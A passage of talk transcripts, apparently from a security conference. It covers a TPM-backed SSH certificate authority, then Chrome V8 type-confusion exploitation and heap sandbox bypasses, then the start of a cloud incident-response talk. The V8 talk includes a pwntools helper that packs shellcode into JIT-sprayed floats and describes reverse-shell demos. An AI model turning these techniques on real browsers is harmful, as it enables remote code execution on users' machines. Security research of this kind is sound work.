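tpm2_makecredential -e ek.pub -s secret.dat -n <AK name> -o cred.blob
# On the client, against the real TPM:
tpm2_activatecredential -c ak.ctx -C ek.ctx -i cred.blob -o secret.out
# secret.out matching secret.dat proves the EK (and AK) live in that TPM.
```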
Yes — so the SSH agent does the TPM key operations for us, and we have a way to prove possession of an identity and of the machine. This leads to the thing I've been hacking on since summer, which is an SSH TPM CA authority. Let's see if this demo actually works. What we're going to do now is run the CA authority. This is
effectively the CA. It runs locally in this case, because that's easy. I'm first going to SSH into my NAS server at home. This should fail... It doesn't fail. OK. We're going to try SSH again. And now we get the password prompt from the client up there, just with ECDSA. What I'm going to do now is run the authority.
And then I'm going to SSH into my NAS. This is going to open the Sigstore identity provider; I click Login with GitHub, and then we're authenticated. It issues a short-lived certificate, and it SSHes into my server. And if you look at the output of the SSH agent, you see that it has provisioned an elliptic curve ECDSA key, and the certificate as well. Yes.
So effectively, the certificates being provisioned are short-lived: they last five minutes, and then we need another one. We've done identity authentication through an OpenID Connect provider, and behind the scenes we've also done the machine identity part, which is the credential protection. A cool part about this is that we haven't re-implemented either the server or the client — we're just hooking into the agent and using that. Other solutions, like the Teleport client/server stuff, require you to fully buy in to both their SSH server and their client, which is probably a hard sell in a lot of enterprises — or for you, if you want to use this. This is just a
cool little hack. The way this works: we make a key, which is the CA key. We set up a configuration that says which SSH host we want; we give it the CA file that signs the requests; and then we give it a list of users that have access to the server. In this case this is my user. I've decided I want to use GitHub; my email is the one I should be logging in with when I use this tool; and "ek" is the hard-coded endorsement key that is part of my machine — the thing I have to use to do the machine identification.
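Something like the following captures the shape of that configuration; the field names here are approximated from the talk, not the project's actual schema:

```
host: nas.example.com              # SSH host the CA signs certificates for
ca_file: /var/lib/ssh-tpm-ca/ca.key
users:
  - user: fox                      # username on the server
    oidc_provider: github          # identity provider, via Sigstore
    email: fox@example.com         # identity the login must match
    ek: "a3f9c2…"                  # hash of the machine's endorsement key
```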
For getting the endorsement key from the machine, I didn't figure out a better way, so I wrote my own little tool. What you get is the hash of the public part of the endorsement key. We need to have it enrolled before we use this, because it's hard to establish this key after the fact — so it's preferably done as part of an enrollment procedure, where the enterprise grabs the endorsement key before handing the machine to the user. That's how we prove the machine is ours. Running the CA server is currently just a localhost thing, all standard. The client setup is the interesting part,
because it's part of the client's SSH configuration. SSH supports something called Match host exec: if you match on some host, it will run a secondary command. In our case, that's our special ssh-tpm-add command, which communicates with our CA, passing the host and our username. That's what fetches the certificate from the CA server into our agent before authentication starts.
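In ~/.ssh/config this looks roughly like the following; the ssh-tpm-add flags are approximated, but Match host ... exec and the %h/%r tokens are standard OpenSSH:

```
# ~/.ssh/config
Match host nas.example.com exec "ssh-tpm-add --url http://localhost:8080 --host %h --user %r"
    # The side effect of the exec command is that a fresh certificate
    # lands in the agent before authentication to the host starts.
```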
The attestation protocol itself is, what should I say — not huge, but a bit complicated. I did a blog post explaining it a few months ago, when I originally wrote this talk, but I'll try to explain it here as well; hopefully some people find it interesting. The CA serves two endpoints, one called Attest and one called Submit. Attest is the one we use to initialize the authentication towards the CA. The CA doesn't know who we are, so we have to provide our username,
which host we're connecting to, and the endorsement key. Submit is for the two challenges we need to complete: the identity provider login and the credential protection. So we create two keys: the attestation key, called the AK, and the TPM-bound key, which is the key on the machine that we'll actually be using. We submit this attestation. The OpenID issuer challenge is effectively the CA verifying that the identity provider has given you valid credentials. We decrypt the credential on the client, and then we submit all of this. Back comes a signed SSH certificate that we throw into our agent. For the bound key, we do a TPM2_Create command, which gives us back the attestation key. CertifyCreation is what we do to make sure the key itself was created on the TPM — this
is the agent communicating with the TPM. We do the same dance again for the TPM-bound key: a create, then certify the creation, which gives us the attestation of the keys. The Attest call itself is us sending the SSH host, the SSH username, and the keys we created. The CA authority does some pre-validation of all of this — ensures it exists in the configuration, ensures everything is well formed — and then creates two secret values: one used for the credential protection, and the nonce, which is used for the OpenID Connect login.
And we send this back. So the client doesn't know up front which OpenID Connect server it uses; it learns everything from the response. This is represented as some Go structures, which are serialized to JSON. We have the attestation parameters — the host, the user, and the attestation information; all of this is flat JSON with some base64-encoded strings. And back we get the interesting part: the credential, which is the encrypted blob; the secret, which is the public part of the shared secret, part of an elliptic curve Diffie-Hellman exchange; the OpenID issuer that we're supposed to be communicating with; and the nonce, which is part of the
OpenID Connect challenge itself.
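Roughly, the two payloads might look like this (the field names are illustrative, not the project's actual wire format):

```
// Attest request: flat JSON, binary fields base64-encoded
{"host": "nas.example.com", "user": "fox",
 "ek": "<base64>", "ak": "<base64>", "key_attestation": "<base64>"}

// Attest response
{"credential_blob": "<base64>",   // encrypted challenge (credential protection)
 "secret": "<base64>",            // public part of the ECDH shared secret
 "issuer": "https://oauth2.sigstore.dev/auth",
 "nonce": "<random string chosen by the CA>"}
```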
The OpenID issuer challenge is the agent connecting to the OpenID Connect issuer. We do a login flow with the nonce that was set for us, and we get the JWT proof back, signed by the OpenID Connect provider. The agent then talks to the TPM and gets the credential decrypted — and because we used the public parts of the endorsement key and the attestation key, this can only be decrypted if we also have the private part of the endorsement key. Back comes the credential, the random string we have to send back, which proves to the CA that the machine is authentic. And when we submit this to the CA authority, we send all of this information back.
The CA authority then checks that everything is valid. It takes the OpenID Connect JWT proof and checks with the OpenID issuer that it's actually signed. It checks that everything matches the configuration we want, and ensures that the decrypted credential from the client is the same as the one we sent. It then takes the public part of the TPM key, synthesizes an SSH key, signs it, and sends the certificate back to the agent.
So the challenge response here — what we send from the client to the CA before we get the SSH certificate back — is the secret, which is the decrypted blob, and a JWT string, which is the proof from our OpenID Connect provider. Back we get the signed SSH certificate, the byte string that we throw into our agent. The end result of all of that is two keys: the private ECDSA key, which lives in the TPM agent, and the certificate, which we use to authenticate the connection itself.
So, improvements. Is the protocol good enough? I don't know. I'm sort of an open source hacker dude, not a proper security engineer, so I have no clue if this protocol is good. But it works, and it gives us some stronger claims on our SSH keys. We should probably do more pinning of the platform keys: we can chain the entire endorsement key back up to the manufacturer, including the serial number of your machine. I need to figure out how that works; I know Teleport does part of this in their enrollment procedure. And SSH is a bit lacking. When you get a signature request from SSH, the agent doesn't actually know which server it's signing something for.
We only get this blob — "please sign this with this key" — and no metadata about the server. It would be better if we could have some signed statement from the host keys saying "this is our metadata, please sign this", because then it would be easier to reason about what we're actually signing, in context. There's also an entire extension mechanism for SSH agents, which we can only use if we re-implement the SSH client itself. It would be good if SSH agents could offload this to another agent or something. So there are a bunch of issues with OpenSSH as well. So, yeah.
So, I've now shown how we can do TPM-bound keys with SSH. We've written a CA authority that can take identity claims and machine identity claims and hand out short-lived SSH certificates, and we can use this as part of our authentication scheme towards our SSH servers. All of the source code is public on my GitHub, if people want to take a look at it. I would say it's more of a proof of concept than a finished thing, but the TPM agent itself is used by multiple people in this room, I think, maybe — so that's something you can look at if you find it interesting. If you have questions, I have a blog, I
have an email, and I have a Mastodon account if anybody wants to look that up. My GitHub is Foxboron as well. Thank you. Thank you very much. And now — is it okay if we take questions in the break? Sure, that's fine. Yeah. You're around for the rest of the day, right? Yes, I am. Excellent. So find Morten and geek out on SSH TPM solutions. And now we have a break until 10:55. We'll see you back here then. Yes, thank you. Thanks.
Welcome back, everybody. Hope the coffee is still flowing freely. We have another in-depth talk here, from Matteo Malvica, an international speaker who is now at home in Norway, like myself and many others here today. It's great that we have this information security community with the mutual benefit of international input. Matteo works with Offsec, and part-time with Outflank as well, red teamers. His work is focused on vulnerability discovery, exploitation, and mitigation. I'll let him introduce himself further and take it away. Let's hear it for Matteo. Hello. Does it work? Yeah, I think so. All right, all right. Good morning, everyone, and thank you
for being here. Today we're going to dive into Chrome exploitation. We'll go through the inner workings of the Chrome architecture, focusing on the V8 JavaScript engine and its exploitation pathways. Turn it on. Yeah. So, we'll start by exploring the Chrome architecture and the V8 pipeline to set a foundation for understanding how things work under the hood. Then we'll take a look at a vulnerability class named type confusion, which will serve as a stepping stone into discussing the three CVEs for today. The first one predates the V8 heap sandbox. Then we move to the modern sandbox era with the second CVE. We wrap it up with the third one, which serves as a fresh example of present-day vulnerabilities. So, technology is not with us today. Okay.
All right. I haven't done anything. I don't know.
Yeah.
It's because I have too many slides, I guess.
Nope. We had the whole break to get this working. Yeah, it was working. Yeah. It's luck.
Better now than later. I don't see it. Now it's black. Can we try with this?
Yep.
I see the projector. Yeah.
Do you see a signal?
Does it work?
This is the tough part of having demos on everybody's personal PC, but we're in it to win it. Cool.
Nice. Nice, nice, nice. Thanks, guys. Cool.
So hopefully it's less boring now. As I was saying, we wrap it up with the third and last CVE, which serves as a fresh example of present-day vulnerabilities inside Chrome. Let's get started. My name is Matteo. I'm a content dev and researcher at Offsec. I'm Italian, based in Norway, and occasionally I play drums in a local indie band.
Where do we start? A bit of context before we jump headfirst into details: why all of this matters. Browsers are among the most used software worldwide, right? So they are valuable targets for attackers. And they are always connected, so any bug that can be exploited can then be pivoted into remote code execution. They also demand speed: we always have dozens of tabs open all the time, so browsers need to be fast and memory efficient. That's why we have JIT compilers. And JIT compilers, as we'll see in a second, are really complex software, and we know that complex software leads to bugs.
So, let's get a brief overview of the Chrome architecture before we start. Today's focus is Chrome and its JavaScript engine, V8, on Windows. Why Windows? Because it's the most widely deployed and targeted operating system in today's enterprises. So, a brief overview of the Chromium architecture. Like many browsers, Chrome runs on multiple processes. The main process communicates with multiple isolated renderer processes through inter-process communication, or IPC, to keep the renderers isolated. So what
is a renderer process, and what does it actually do? Each renderer process is responsible for rendering JavaScript, the DOM, and CSS, amongst other things. As you can imagine, the renderer process is the most vulnerable piece of the chain, since it ingests all the untrusted JavaScript code. And to protect each renderer process, we also have the process sandbox, which is outside the scope of today's talk. So we normally have a sandbox on top of each process, called the process sandbox. But before analyzing the first bug today, let's discuss how V8, the JavaScript engine, works under the hood. From a bird's-eye view, that's how V8 operates, and the same model broadly applies to the JavaScript engines in other browsers. What we have: we
have a parser, an interpreter, and an optional compiler. The parser is the one responsible for processing the JavaScript source code: it breaks it into tokens and generates an AST, an abstract syntax tree. The AST is a structure representing the code's syntactic relationships. The tokens are basically, if you have a statement like x = 10, each a single individual piece of it. So the parser generates this abstract syntax tree, which represents a hierarchical structure of the different code tokens. Then we have the interpreter, which takes the AST as input and generates bytecode. Bytecode is just an intermediate representation of the program, designed to be executed by the interpreter's virtual machine. And the
interpreter originally could just execute whatever JavaScript it got, directly via the virtual machine. So back in the day, browsers mainly just had the interpreter. But, as we anticipated, we need speed. We need a good memory footprint, right? So we need a better way to produce optimized machine code. That's why we have compilers. And some of these compilers are just-in-time compilers, which means they generate optimized machine code at runtime, right?
This is a more recent view of the V8 pipeline, from 2022, so two years ago. What do we have? We have the parser, which again outputs an AST and gives it to Ignition, which is the interpreter. Then, as I said, we can have plain execution directly from the interpreter. However, one of the responsibilities of the interpreter nowadays is to generate statistics and data about what's going on, about which kinds of functions are executed, and this is done through the profiler. The profiler marks as hot code whatever function is executed many times. So, let's say we have a function that is executed 10,000 times or even more; then at
that point the function is marked as hot code, or a hot function, and this is a signal to the JIT compilers. Two years ago, we had two different JIT compilers, TurboFan and Sparkplug. Sparkplug is the non-optimizing compiler, and TurboFan is the optimizing one; we'll see the difference in a second. So basically, whenever we have hot code, a function that gets executed a lot, the JIT compilers kick in, they produce their optimized code, and then the function gets executed. Sounds simple. So this is today's actual pipeline, with a new actor called Maglev. In December 2023, last year, Google introduced this new JIT compiler, Maglev, which acts as a compromise between Spark
plug and TurboFan. So, actually, we have a four-tier pipeline: four actors that can execute code. Ignition, in a simpler way, and then the three JIT compilers. All three can generate optimized machine code, but they are fast and optimized in different ways. For instance, TurboFan is the one that generates the most optimized machine code, but it's also the one that takes the most time to produce that code. So, in case we have some JavaScript code that needs to be optimized quicker, we might use Sparkplug or Maglev according to our needs. So, let's now get a brief review of JavaScript types, bytecode, and the entire JIT compilation
pipeline, and how JavaScript actually gets executed in V8. As we said, Ignition is not optimal: the interpreter just executes JavaScript code through the virtual machine, and the machine code it produces is not optimized at all. But anyway, let's see how JavaScript code works behind the scenes.
The interpreter, as we said, takes bytecode as input and executes it via the JavaScript virtual machine, right? And the virtual machine is responsible for executing the final bytecode. But what is bytecode in the end? This is a simple example: a function, addTo, that adds two to whatever property we send in. We call the addTo function, and it takes property x of an object and adds 2 to it.
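The listing being walked through here looks roughly like this. It's a reconstruction, not verbatim d8 output: real --print-bytecode listings carry feedback-slot operands and offsets that vary by V8 version.

    ;; roughly: function addTo(o) { return 2 + o.x; }  called as addTo({x: 13})
    LdaSmi [2]              ;; load the small integer 2 into the accumulator
    Star r0                 ;; store the accumulator into register r0
    GetNamedProperty a0     ;; load argument a0's property x (here 13) into the accumulator
    Add r0                  ;; accumulator = accumulator + r0
    Return                  ;; return the accumulator (15) to the caller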
The first line is responsible for loading an SMI, a small integer, into the accumulator. In the JavaScript virtual machine, we have virtual registers. One of those registers is the accumulator, which is not an actual physical register as you would have in a CPU; it's just a virtual register, but it is very handy for short operations. So, in this case, we load 2 into the accumulator on the first line. Then, we store the value in the accumulator into r0. On the third line, GetNamedProperty loads the function argument a0, the first one, into the accumulator. Next, we add whatever we have in r0, in this case 2, to whatever is in the accumulator, in this case 13, because we are passing 13 as an argument. Then, on the last line, we return 15 from the accumulator to the calling function. That's a simple bytecode example. So, we also have just-in-time compilation, as mentioned. The interpreter-generated code is not optimal when functions are executed often. How do we solve this? With just-in-time compilation, right? But first, we need to solve some issues with the JavaScript language: how do we store type information?
As JavaScript is a dynamically typed language, the engine must store type information with every runtime value. In V8, this is accomplished through a combination of pointer tagging and the use of dedicated type-information objects called maps. Here we have all the different kinds of objects that we can have in the engine, basically. We have SMIs, small integers, and everything else is a heap object. So the engine treats everything else as a heap object, right? And among these objects, we also have something called a map, which is really important for our focus today. In the end, the engine marks with a least significant bit of zero anything that is an SMI, and with one, anything that is a heap object. So the least significant
bit plays a crucial role in how the engine treats an object versus a small integer.
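As a toy illustration of that tagging rule, here is a minimal Python sketch. It is simplified: real 64-bit V8 additionally shifts SMIs and compresses heap pointers, but the least-significant-bit test is the core idea.

    def is_smi(tagged_value: int) -> bool:
        # LSB 0 => small integer (SMI)
        return (tagged_value & 1) == 0

    def is_heap_object(tagged_value: int) -> bool:
        # LSB 1 => tagged pointer to a heap object
        return (tagged_value & 1) == 1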
We mentioned that JavaScript is a loosely typed language, so the compiler doesn't know the data types in advance. But it learns from past runs and guesses how the code will be used in the future, and it makes optimizations based on those assumptions, like creating faster code assuming the types will stay the same. So how does JavaScript actually keep track of data types? More on that in a second. In C++, for instance, we have this simple function that adds two integers, and we can produce fairly consistent assembly code, right? Because
it's a language with strong types, right? JavaScript, on the other hand, doesn't have that: we don't know which values will be passed to this function beforehand. So we need to keep track of data types. How do we do that? With maps. Maps are a really key feature in V8; they're also referred to as hidden classes, or shapes in SpiderMonkey (the JavaScript engine in Firefox), or structures in JavaScriptCore in Safari, or types in Chakra, the old Edge engine. So, really not confusing at all.
But in this case, maps: V8 and Chrome use maps, so we will stick with that terminology for now. In this example, we have an object with two properties, 1 and 2, so two small integers. Let's see how they look in memory. Whenever we need to debug something in V8, we don't need to compile the whole Chromium project, because that takes five hours on a beefy PC today; compiling all of Chrome takes a lot of time. We just need to compile V8, and it comes with a handy tool called d8, a debugging shell. Through d8 we can debug V8, and it prints a lot of different values we normally wouldn't be able to see. In this case, we print object 1, and in the green box we have the array with all the elements set, and then in red we have the map, at that address. Let's add a second object with the same types but different values. And guess what: we print object 2 in memory, and we have the same map. Objects with the same shape share the same map in memory. This is a way for V8 to be efficient, so we don't create a new map for objects that share the same types, right? And they also share the same fixed array.
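That d8 session looks roughly like this. This is a sketch: the addresses are invented, and %DebugPrint requires running d8 with --allow-natives-syntax.

    d8> var obj1 = {a: 1, b: 2}; %DebugPrint(obj1);
    DebugPrint: 0x20d90004a6c1: [JS_OBJECT_TYPE]
     - map: 0x20d900046d21 <Map[20](HOLEY_ELEMENTS)> [FastProperties]
    ...
    d8> var obj2 = {a: 3, b: 4}; %DebugPrint(obj2);
    DebugPrint: 0x20d90004a789: [JS_OBJECT_TYPE]
     - map: 0x20d900046d21 <Map[20](HOLEY_ELEMENTS)> [FastProperties]   (same map as obj1)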
So, we mentioned TurboFan in the beginning, which is the optimizing JIT compiler in V8. Let's see how it looks behind the scenes. We have three JIT compilers now: Sparkplug, Maglev, and TurboFan. TurboFan takes the bytecode from the interpreter and creates an intermediate custom representation, an IR, which is basically a graph with nodes (the code operations), control-flow edges, and data-flow edges (the inputs and outputs of the bytecode). So how does it actually operate? The IR graph is built by analyzing bytecode and type profiles, formulating speculations about types, and possibly guarding them with speculation guards; more on
speculation guards later. So once the JIT compiler is happy with the graph building, it starts the important phase of optimization, where the JavaScript is improved and the memory footprint is reduced. And then we have the last phase, which is lowering: it basically pushes the optimized machine code to memory for optimal execution. Cool. So, we mentioned speculation guards. What are speculation guards? There's no guarantee that the map will stay the same for a given object over time, right? JavaScript is a dynamic language, so that changes. The Ignition interpreter generates feedback which is used by TurboFan to make speculations about the type of a given property, for instance. And then TurboFan uses something called a
speculation guard to make sure, as much as possible, that we don't have bugs that hit the type of the property. In this case, we have two examples of speculation guards. The first one is the speculation that makes sure we are dealing with an SMI; we mentioned at the beginning that every SMI has a least significant bit of zero. So we test that the actual property is a small integer, and if not, we bail out. What does bailing out mean? We don't crash the process, obviously; otherwise it wouldn't be reliable. What we do here is simply de-optimize the machine code. We go back to the
interpreter and tell it: okay, just generate non-optimized code, because clearly we have something wrong going on, and we cannot risk using a map that is not representing the correct type. In the second example, we're actually checking the pointer, the map pointer held in RDI, against a given map. And if that pointer does not match the given map, then again, we bail out and de-optimize the code. That's it, in general.
So let's move on to JIT. Everything is nice and fun: we have JIT compilation, and we mentioned something called a hot function. Here we have an example of a hot function. It's simple: a function that adds two properties of an object, and we execute that function several times, 10,000 times here, assigning i to both property a and b at runtime. At this point, the interpreter should be smart enough to signal TurboFan: hey, we have an add function that gets executed all the time, we have to do something, we have to produce optimized code, and I'm not capable enough to optimize this code myself, right? So, one of the
optimization features of the JIT compiler, for instance, is something called redundancy elimination. In this case, again, we have a function foo that returns the sum of two properties. This feature is basically a class of optimizations in TurboFan that aims to safely remove checks from the emitted machine code if it thinks they're unnecessary. Here we have the checks on the object, right? CheckHeapObject and CheckMap, two times: in the first block and in the second block. So TurboFan just decides: okay, why don't we remove the second check? It's just repetition, it's unnecessary. However, are we really sure that we cannot have any possible side effect in between? What can possibly go wrong here?
Right, let's introduce a bug class called type confusion vulnerabilities, which is a fairly new vulnerability class. JIT engines are complex because compiling at runtime requires balancing speed, optimization, and secure coding. Bugs arise during JIT compilation due to missing checks; that's basically what type confusions are. As we said, JIT engines are highly complex systems, so we have high chances of bugs. The JIT engine assumes that data is of one type at compile time. However, due to unforeseen side effects of JavaScript operations, sometimes at runtime that data type changes without the related type checks. We are missing the right speculation guards, for instance, and something can go wrong. Type confusion might lead to out-of-bounds reads and writes, and ultimately code execution.
So the important key takeaway here is that we have a logical bug that turns out to be a memory corruption bug, which could also open a discussion on Rust and memory-safe programming languages, but let's not digress. Let's discuss the first of the three bugs. The first bug here is a very typical type confusion and predates the heap sandbox, so we can get a sense of how a V8 bug can get exploited without extra mitigations. This is a bug that was filed by Samuel Gross from Project Zero, who is, by the way, also the author of the modern V8 heap sandbox. In this line, the yellow part is basically the root cause of the bug. Here, the kNoWrite operator states that
the engine assumes that this operation will not have any observable side effects. But the object's map here gets changed when the object becomes a prototype. What's happening is that we call Object.create, which calls GetObjectCreateMap. What this function basically does is generate a new map for a given object. However, the object passed in is converted to a prototype object, which also changes its associated map. This is the kind of unforeseen side effect that the JIT compiler hasn't taken into account.
We have something I call maps confusion. It's just my definition, but it's a specific kind of type confusion where you're actually confusing maps, which happens a lot in JIT engines. In this case, we are analyzing the buggy V8 version. We print the object, we invoke the vulnerable function, Object.create, and then we print the object again and see what happens. The first time we print the object, we have a map with fast properties. The second time, the map has magically changed: it's dictionary properties now. That's not good, because the map should be as deterministic as we can make it. If the map changes and the type is not checked, we are
able to abuse this situation. So, I'm not going to cover all the exploitation steps, because that would require a lot of time for each bug, but at a high level,
whenever we obtain relative read and write primitives, from those we can obtain arbitrary read and write primitives. And then, what about code execution? We are able to read and write arbitrarily in the V8 heap, but how can we execute our shellcode? Especially because the V8 heap is non-executable: the pages are readable and writable, but not executable. What do we do? Enter WebAssembly, and specifically WebAssembly shellcode. WebAssembly is in-browser, client-side support for lower-level languages like C or C++. In Chromium, it's compiled by another engine called Liftoff. And to reference WebAssembly code in V8, we have something called jump tables.
Basically, they are jump tables to the WebAssembly functions, and those pages are read-write-executable. So, yay: we can basically write our shellcode there and reference it from the V8 heap. So this is the first demo, which is prerecorded. Here we just run the whole exploit and get a shell on our Kali Linux. Cool. That's the first one. Moving on: the second CVE. This is a modern, sandbox-era bug from last year. It affects Maglev; we mentioned the new compiler, Maglev. This bug was discovered by Man Yue Mo from GitHub Security Lab. As with anything new in software, it brings bugs with it, right? But before analyzing the bug itself, let's first explore the purpose of the heap sandbox, which is one of the goals of this presentation. So we
mentioned the process sandbox at the beginning, right? The process sandbox is the sandbox actually protecting the entire renderer process, or other Chrome processes. This has nothing to do with that: this is the sandbox that is supposed to protect the actual heap in the renderer. Up until now, we needed just two vulnerabilities to get a system foothold via a browser exploit: one in the renderer, and one to escape the process sandbox, and we could get onto the host. Now, the situation is a little more complex. We need three vulnerabilities, or two bugs and one bypass: again the renderer, then the heap sandbox bypass, and then the process sandbox. So the cost for
attackers is definitely increased. How does the V8 heap sandbox actually work? It was rolled out around 2022. It's software-based, and the V8 heap is contained in the sandbox, also known as a cage, or Ubercage, which is a predefined memory region defined at startup. And we have something called a pointer table, which is the essence of this sandbox. Objects inside the heap are referenced via offsets and indices into a pointer table that exists outside the V8 heap. So what's the deal with that? Basically, we don't have full pointers anymore in the heap. What was possible in the past was that, in a typical bug like the first
one we mentioned today, we had something called a backing-store pointer in an ArrayBuffer. This is an ArrayBuffer dump: in yellow, in the first output, we have the backing-store pointer, a full pointer that can be used to obtain arbitrary read and write primitives. And with the heap sandbox, we don't have it anymore. We just have 45c, which is an offset into the... not the jump table, the pointer table, sorry. So we have an offset, not a full pointer anymore, and we cannot do much with just an offset. So one of the goals of the heap sandbox is to remove all the full pointers in the V8 heap. So,
attackers, even though they get read and write access into the sandbox, cannot abuse it that much, right? So, let's go back to the second CVE and its analysis. We mentioned that Maglev is a new compiler, rolled out last year: a mid-tier compiler that balances efficiency between Sparkplug and TurboFan. It generates less optimized code, but it does so quicker than TurboFan, and in some cases you want to use Maglev instead of TurboFan. This is done behind the scenes by V8; you don't have to configure anything, this logic is implemented in the engine. The bug itself is a failing check while creating a default receiver object. Again, the same map is used for a different type. Sounds familiar? Again, maps confusion, which leads to
type confusion. Okay. So what's the deal for us? Standard WebAssembly shellcode is not possible anymore due to the heap sandbox; we cannot reference it anymore.
But we can still read and write some function pointers, right? We mentioned that the heap sandbox was rolled out two years ago, but until recently it wasn't fully complete. So they rolled it out, but it wasn't as complete as it is today. It's not perfect today either, but it's better. Back then, last year, not every pointer was actually an offset; that's the whole point, right? JIT-compiled function pointers are represented as full pointers
from the V8 heap perspective, so we can still abuse those pointers. How do we do that? We can modify those function pointers to jump right into JIT-sprayed shellcode. What the heck is JIT-sprayed shellcode? Let's see what it is. It's a fairly new technique, like one or two years old, something like that. So basically, what do we have here? We have a function that just returns three floats: 1.1, 2.2, 3.3, right? Then we JIT-compile that function, and as a last statement we just print the function and see how it looks in the debugger. So this is from WinDbg; that's the JIT-optimized code for the function, right? And
what we see here in the red block is that basically that number is moved into R10, and we have the same for the other two numbers. So likely those are our three floats. And if we convert that value into a double, that's 1.1, our first float. But what's the deal? Why is this helpful? Well, what if we could treat this float data as code and not data? So let's change those three float values into something that apparently doesn't make sense, three random floats, and see how that looks in memory. So we dump the same values, but instead of dumping them, we disassemble them. And guess what? Those floats decode as assembly. So we have an int3
breakpoint and a few NOPs. So the idea here is that we can make those float values be interpreted as instructions of our shellcode, and then jump over the JIT-emitted mov instructions in between, which are not necessary. So basically, we jump between chunks of shellcode of our choosing. The only caveat here is that we can only encode six bytes at a time: six bytes of shellcode and then the jump instruction. But we can generate that shellcode pretty easily with pwntools. I haven't found a better way to do that, sorry, but that's what we have. With pwntools, we can write the shellcode as assembly, as always, and then print it out as JavaScript floating-point values.
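A minimal sketch of that pwntools step: assemble the payload, slice it into 6-byte chunks, append a 2-byte short jump to each, and reinterpret every 8-byte chunk as an IEEE-754 double. The int3 stand-in payload and the jump offset are illustrative; a real exploit tunes the offset to hop over the JIT-emitted bytes between constants.

    import struct
    from pwn import asm, context

    context.arch = 'amd64'

    def shellcode_to_floats(shellcode: bytes) -> list:
        floats = []
        for i in range(0, len(shellcode), 6):
            chunk = shellcode[i:i + 6].ljust(6, b'\x90')  # pad the tail with NOPs
            chunk += b'\xeb\x0c'  # short jmp over the next mov's bytes (offset is illustrative)
            floats.append(struct.unpack('<d', chunk)[0])
        return floats

    payload = asm('int3')  # stand-in payload; replace with real shellcode
    for f in shellcode_to_floats(payload):
        print(repr(f))  # paste these doubles into the JIT-sprayed function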
And then we replace this shellcode inside our exploit. So we have a tool that can generate that. We don't have to do that manually. So let's demonstrate the second exploit with the second demo. Yeah.
Here we're just getting calc, because I was too lazy to do a full reverse shell, but that's code execution on Windows. So the last CVE that I'm going to present today is pretty recent; the write-ups are from August.
This is another type confusion found by Man Yue Mo, again from GitHub Security Lab.
So, this is another type confusion in maps, via PrepareForDataProperty. Basically, when an object's structure changes, like a property addition, a new map is created. And, of course, the bug happens while transitioning
from one map to another without the expected checks. Again, similar to what we saw earlier, but in a different piece of code. So how do we perform the sandbox escape? Previously, we used JIT-compiled code pointers. But now, in this latest version of the heap sandbox, the WebAssembly pointers are gone, so we cannot abuse those anymore. We have something else in Chrome called Blink. Blink is responsible for rendering web pages, processing HTML, CSS, layout, and the DOM, but it lives outside V8, so it is not part of the JavaScript engine. However, inside the V8 heap, we can reference those objects via embedder fields in the heap. Obviously, those objects are referenced as offsets, as we saw in the heap sandbox definition. So we don't have full pointers, just offsets. So
what if we can cause a second-level type confusion by swapping those offsets? And yeah, we basically get a read-write primitive outside the V8 heap. So we are not actually bypassing the V8 heap sandbox per se; we live by its rules and apply the read-write primitive via the offsets, not full pointers. With that, we basically leak the trusted cage base, which is the heap sandbox base address, so we can get a full write primitive. We locate the address of the JIT-compiled WebAssembly code through the import target, the imported-function entry in the dispatch table, and then we hijack the code pointer via DOMRect, basically the properties of
this object, which is one of the Blink objects we are abusing, living outside V8. So basically, in the end, we are hijacking the WASM JIT code when the exported function is called. Under normal circumstances, calling a WebAssembly function will just execute it inside WASM, sort of sandboxed, with no interaction with the rest of the system. But this way, we are creating a type confusion inside external V8 objects. So, for the last demo, I decided to do it live on a box that is at home. Let's see if it works. It's a bit risky. Let's see.
How do I share this? I think I need to stop presenting.
I'll do a share. Give me a second. Hmm.
Sorry, give me a second. Okay. Maybe.
Yes. Okay. Cool. All right. Can you see anything? Yes. So we have our Kali Linux listening on port 443. We have a web server in Python that's serving the exploit. And then we have the official Chrome build. One thing that I didn't mention: to debug the whole exploit, we couldn't just have V8, we had to compile the entire Chrome, because the objects that we are abusing in the end are from Blink. So let's start Chrome with the no-sandbox option, meaning that we are not going to test the process sandbox. So what we do here is browse to the vulnerable server and the vulnerable... yeah. And then we get a shell on Kali. Yes.
That's a full reverse shell. Yes.
Thanks. So, a few key takeaways from this. As we said, browsers are complex, high-value targets for attackers. Type confusion bugs will likely persist in V8 due to its JIT nature: because it's a complex piece of software, we're going to have bugs, no matter what. However, the V8 heap sandbox increased the attacker's cost, though as we saw, it's not bulletproof. So we're going to have bypasses, likely until it's rolled out with full hardware support. The end result is that three bugs are now required to get a full system shell. All the bugs from today you can find on this website. Thank you.
Yeah, amazing. So that's why we had to go through all the hassle with these million different adapters up here, to finally get this working so that we could do a real live demo: three terminal windows live before your eyes. Thanks, Matteo. He'll be here for the rest of the day. Yeah, great. Thank you very much. All right, moving right along: find Matteo if you have questions; we're going to move right along with the schedule. Next we have Karim. That's my best pronunciation, apologies; he'll tell you his name. Thank you so much for joining us, and to O3Cyber for also supporting B-Sides here today. So now we've got something a little more blue-teamy. You see how we do that? We go back and forth between, let me just
stick this in your pocket here, back and forth between the red and the blue, and we make that beautiful shade of purple, just like the O3. I have it. Oh. We're switching it up. I'm on mic two. Yeah, mic two, and mic three is going off stage. All right, let's hear it for Karim. Thank you.
So my talk is named Post-Compromise: Uncovering Clouds and Assessing Risks. Just really quickly about me: I'm a principal at O3Cyber, and I do multi-cloud security. Let's jump right into it and set the stage, which is going to be with us through the entire presentation. In this scenario, we're a multinational corporation, and we've been hit with malware, ransomware in this case. That's what drives the scenario initially. So we have ransomware affecting most of the infrastructure, and we have limited access to our documentation and existing information, because most of the systems are down or being recovered
in this case. But what about the cloud? The attack we're talking about only affected the on-premises infrastructure, not the cloud. So my first question is: what about the cloud environment? You're a multinational corporation with a large footprint; you definitely have some cloud in here. The first question is: what clouds do they have? Because, again, there's no documentation. There are some guys who know where all the infrastructure is in the data center, but there's really no one with a full overview of the cloud in this organization. So the first part of the journey will be to find out what clouds are there. We're equipped with what I would say is the equivalent of a Swiss Army knife for
most of the people in this room: Python, PowerShell, a 5G router, and some duct tape. And we're going to start finding the clouds. We know the organization has cloud, but we don't know who is using it. We do have an idea of what it's being used for. But where do you start finding out who owns these clouds when your CMDB is down? I guess the first step is to search through some SMTP logs. You look for senders such as *@amazonaws.com, *@azure.com, or cloud-noreply@google.com, which gives you an idea. You can also search the certificate transparency logs for what certificates have been issued for
